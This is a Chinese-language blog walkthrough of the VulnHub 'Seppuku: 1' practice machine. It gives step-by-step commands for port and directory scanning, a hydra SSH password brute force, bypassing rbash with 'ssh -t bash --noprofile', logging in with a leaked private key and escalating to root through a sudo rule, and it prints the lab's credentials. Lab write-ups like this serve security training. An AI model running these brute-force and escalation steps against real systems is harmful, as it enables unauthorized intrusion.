vulnhub Seppuku: 1

最新推荐文章于 2024-02-18 23:45:00 发布
最新推荐文章于 2024-02-18 23:45:00 发布
阅读量737 收藏 1
点赞数
分类专栏: vulnhub 文章标签: rbash 私钥 hydra
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/elephantxiang/article/details/125922125
版权

渗透思路:

nmap扫描 ---- gobuster扫描网站目录 ---- hydra爆破ssh密码 ---- ssh -t绕过rbash ---- 密码泄露切换到samurai,发现可以sudo提权,但提权用的命令不存在 ---- tanto用户私钥ssh登录,创建提权所需命令文件 ---- samurai用户sudo提权

环境信息:

靶机:192.168.101.86

攻击机:192.168.101.34

具体步骤:

1、nmap扫描

sudo nmap -sV -sC -p- 192.168.101.86

扫出来一堆端口,其中80、7080、7601、8088都是http或者https

2、gobuster扫描网站目录

用gobuster扫描80、7080、7601、8088端口,只有7601端口扫描出有意义的目录(只有/w,/production,/keys,/secret下面有东西)

​gobuster dir -u http://192.168.101.86:7601 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

3、在一堆兔子洞中找到系统用户名和密码字典

http://192.168.101.86:7601/w和http://192.168.101.86:7601/secret/下都有password.lst文件,是同一个密码字典,保存下来(以防万一不是同一个,我用的是http://192.168.101.86:7601/secret/password.lst

http://192.168.101.86:7601/secret/下的passwd.bak和shadow.bak都是兔子洞

http://192.168.101.86:7601/keys/下面两个私钥虽然不是兔子洞,不过暂时没用,先留着备用

真正的系统用户名在http://192.168.101.86:7601/secret/hostname里面

seppuku

4、hydra爆破ssh密码

用hydra爆破seppuku用户的ssh密码,密码字典来自http://192.168.101.86:7601/secret/password.lst

hydra -l seppuku -P "/home/kali/Downloads/password.lst" ssh://192.168.101.86

得到seppuku的密码eeyoree

ssh登录成功

ssh seppuku@192.168.101.86

5、ssh -t绕过rbash

seppuku用户ssh登录之后发现是rbash,不能切换目录

退出ssh登录,重新用如下命令登录

ssh seppuku@192.168.101.86 -t 'bash --noprofile'

成功绕过rbash

6、绕来绕去的sudo提权

(1)密码泄露切换到samurai,发现可以sudo提权

在seppuku的家目录下(/home/seppuku)发现一个.passwd文件,文件的属主是root,文件内容是

12345685213456!@!@A

目录切换到/home,发现另外两个用户的家目录

尝试以12345685213456!@!@A为密码,分别切换到用户root、samurai、tanto,只有samurai切换成功

su - samurai

切换成功后,查看samurai可以sudo执行什么命令

sudo -l

发现samurai可以以任何用户身份执行/home/tanto/.cgi_bin/bin /tmp/*

来到目录/home/tanto下,发现并没有.cgi_bin文件夹,而又只有tanto用户可以在自己的家目录下创建文件夹和文件,所以还得想办法用tanto用户登录。

(2)tanto用户私钥ssh登录,构造提权条件

这时想起来http://192.168.101.86:7601/keys/下还有两个私钥文件,我下载了private.bak,重命名为private,并用它作为tanto的私钥进行ssh登录,用-t参数绕过rbash

ssh tanto@192.168.101.86 -i private -t 'bash --noprofile'

输入如下命令创建/home/tanto/.cgi_bin/bin,使其内容为/bin/bash,并赋予可执行权限

tanto@seppuku:~$ mkdir .cgi_bin
tanto@seppuku:~$ cd .cgi_bin
tanto@seppuku:~/.cgi_bin$ echo '/bin/bash' > bin
tanto@seppuku:~/.cgi_bin$ chmod +x bin

(3)samurai进行sudo提权

samurai的shell中执行如下命令,sudo提权到root,并在/root文件夹下找到root.txt

sudo /home/tanto/.cgi_bin/bin /tmp/*

仙女象
关注
专栏目录
Vulnhub:Seppuku靶机
qq_43884092的博客
03-04 165
在7601端口下的secret目录发现password.lst密码字典,配合收集到的系统用户爆破ssh。在tanto用户加目录下创建.cgi_bin目录,目录下创建名称为bin的可执行文件。在/var/www/html/keys目录下发现tanto用户的ssh私钥。samurai用户sudo权限,提权需要在tanto用户家目录下创建文件。在seppuku用户加目录下发现.passwd文件。尝试后发现可以切换到samurai用户。靶机:192.168.111.212。通过vi编辑器绕过rbash
靶场实战(12):OSCP备考之VulnHub SEPPUKU
OneMoreThink
01-09 1078
打靶思路资产发现主机发现服务发现(端口、服务、组件、版本)漏洞发现(获取权限)21端口/FTP服务组件漏洞口令漏洞80端口/HTTP服务组件漏洞URL漏洞(目录、文件)7080端口/HTTPS服务组件漏洞URL漏洞(目录、文件)7601端口/HTTP服务组件漏洞URL漏洞(目录、文件)提升权限seppuku用户sudosuidcron内核提权信息收集samurai用户sudosuidcron内核提...
PG::Seppuku
aya3t的博客
11-28 335
PROVING GROUNDS::Seppuku
实战打靶集锦-024-Seppuku
最新发布
阿尔泰野狼的博客
02-18 902
本文记录了博主的一次打靶经历,涉及密码爆破、ssh key登录、rbash绕过等
OSCP Seppuku
m0_52545432的博客
05-12 147
● /usr/bin/ln -sf /root/ /tmp/ - 这是一个用于为 /root/ 目录创建符号链接的命令,链接将位于 /tmp/ 目录中。还有一个passwd打开是一个密码的字典,猜测可能是等下爆破要用这个字典,先把目录切换到桌面,再利用wget命令把这个passwd.lst保存到桌面。成功登录后,发现根本就没有这个文件,所以我们选择自己去创建这个目录,以及写一个bin文件,内容为/bin/bash。两个页面是一样的,还有一个页面打不开,试试目录扫描,对这个7601端口的页面。
seppuku:强大的技巧
02-03
Seppuku是一个免费的,开源的,轻量级的Minecraft 1.12.2 mod,不久将用于更新版本。 最初面向9B9T和2B2T无政府状态服务器; 它是一个功能齐全的客户端mod,带有外部插件系统,独特的漏洞利用和。 请查看以获取...
seppuku:Delphi项目指标分析工具(圈复杂度)
04-29
版本1 (env)$ setup/compilar.bat - Transforma Python files em um único .exe - Gera um setup de instalação 版本2 - Execute seppuku.py pelo prompt. - Utilize passando 2 argumentos (seppuku.py c:\...
Seppuku-开源
04-27
Seppuku是一款基于机器学习算法的数据包分解器,它的核心功能是通过用户提供的样本数据包,训练模型以识别特定类型的数据包。这款工具对于网络分析、数据挖掘以及网络安全专业人士来说非常有用,因为它可以帮助用户...
OSCP系列靶场-Esay-Seppuku保姆级
杳若的博客
08-25 991
OSCP系列靶场-Esay-Seppuku保姆级
hadoop日志解析方式总结
weixin_33708432的博客
07-18 264
2019独角兽企业重金招聘Python工程师标准>>> ...
IP地址、子网掩码、网络号、主机号、网络地址、主机地址以及ip段/数字-如192.168.0.1/24是什么意思?
热门推荐
OSKernelLAB(gatieme)
03-26 35万+
背景知识IP地址IP地址被用来给Internet上的电脑一个编号。大家日常见到的情况是每台联网的PC上都需要有IP地址,才能正常通信。我们可以把“个人电脑”比作“一台电话”,那么“IP地址”就相当于“电话号码”,而Internet中的路由器,就相当于电信局的“程控式交换机”。 IP地址是一个32位的二进制数,通常被分割为4个“8位二进制数”(也就是4个字节)。IP地址通常用“点分十进制”表示成(a
cengbox2靶机(hydra爆破、公私钥免密登录)
m0_66299232的博客
12-06 577
靶机链接:百度网盘 请输入提取码提取码:zdpr虚拟机网络链接模式:桥接模式攻击机系统:kali linux 2021.11.arp-scan -l探测目标靶机ip2.nmap -p- -A -T4 192.168.1.107探测目标靶机开放端口和服务3.gobuster dir -u http://192.168.1.107 -w /usr/share/wordlists/dirb/big.txt -t 50用gobuster扫描目录,啥也没有1.登录ftp,将note.txt下载下来2.得到俩个名字ke
VulnHub渗透测试实战靶场 - SICKOS: 1.1
LYJ20010728的博客
08-08 1921
VulnHub渗透测试实战靶场 - SICKOS: 1.1环境下载SICKOS: 1.1靶机搭建渗透测试信息搜集 环境下载 戳此进行环境下载 SICKOS: 1.1靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l ...
shadow文件的MD5密码破解
Onlyone_1314的博客
02-10 9475
shadow文件的MD5密码破解 root:$1$abcde$LULigrJwcdszq2ReOX7bG/:15933:0:99999:7::: hint:密码长度不超过6 root:$1$abcde$LULigrJwcdszq2ReOX7bG/:15933:0:99999:7:::这是在linux下的shadow文件中,用来存放用户的账户和密码,在/etc/shadow目录下。 其内容用“:”号隔开,分别表示不同的内容: 1)“登录名”(root):是与/etc/passwd文件中的登录名相一致的用户
Hydra 爆破ssh
qq_43757105的博客
10-23 3190
目录 Centos7开启ssh服务 在Kali中生成一个4位数的密码字典 用Hydra爆破靶机centos7的密码 Centos7开启ssh服务 SSH配置看博客 查看ssh服务开启状态:systemctl status sshd.service 开启ssh服务:systemctl start sshd.service 检查一下22端口是否开启:netstat -an | grep 22 在Kali中生成一个4位数的密码字典 用Hydra爆破靶机c...
C++异常的幕后15:找到正确的着陆垫
wuhui_gdnt的专栏
05-31 256
原文地址:https://monoinfinito.wordpress.com/2013/05/02/c-exceptions-under-the-hood-15-finding-the-right-landing-pad/ 作者:nicolasbrailo 这是我在这个博客里所写的最长系列文章中的第15篇;目前我们已经了解到异常如何抛出,并且已经编写了通过某种反射,能够检测catch块(在异...
使用Nmap获取SSH、SSL\TLS中公钥、cipersutes、签名等相关数据
qq_35324057的博客
02-26 1万+
Nmap工具 相关脚本 ssh-hostkey显示SSH主机的公钥 ssl-enum-ciphers该脚本重复启动SSLv3 / TLS连接,每次在记录主机是否接受时都尝试使用新的密码或压缩程序。最终结果是服务器接受的所有密码套件和压缩器的列表,主要就是返回的主机所使用的密码套件和椭圆曲线。 ssl-cert检索服务器的SSL证书。我主要通过这个脚本获得了以MD5和sha-1输出的签名,但是我还没...
go语言编写端口扫描的学习笔记(一)
qq_41132792的博客
08-27 778
go语言编写端口扫描器学习过程
Pikachu靶机通关和源码分析
Aiwin的博客
07-25 4143
Pikachu靶机通关和源码分析
靶机DC-2练习:通过rbash绕过获取shell,使用git命令提权
7Riven's blog
12-24 1836
1.主机发现 靶机IP地址:192.168.109.163 2.扫描目标服务版本 3.发现80端口,访问主页 访问失败 很显然,本地不解析该域名,在/etc/hosts文件中添加即可 再次刷新网页 单击首页左下角 发现flag1:出现疑似用户名cewl,登录后找下一个flag 网页其他模块未发现有效信息,接下来扫描一下后台目录 4.工具扫描后台目...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值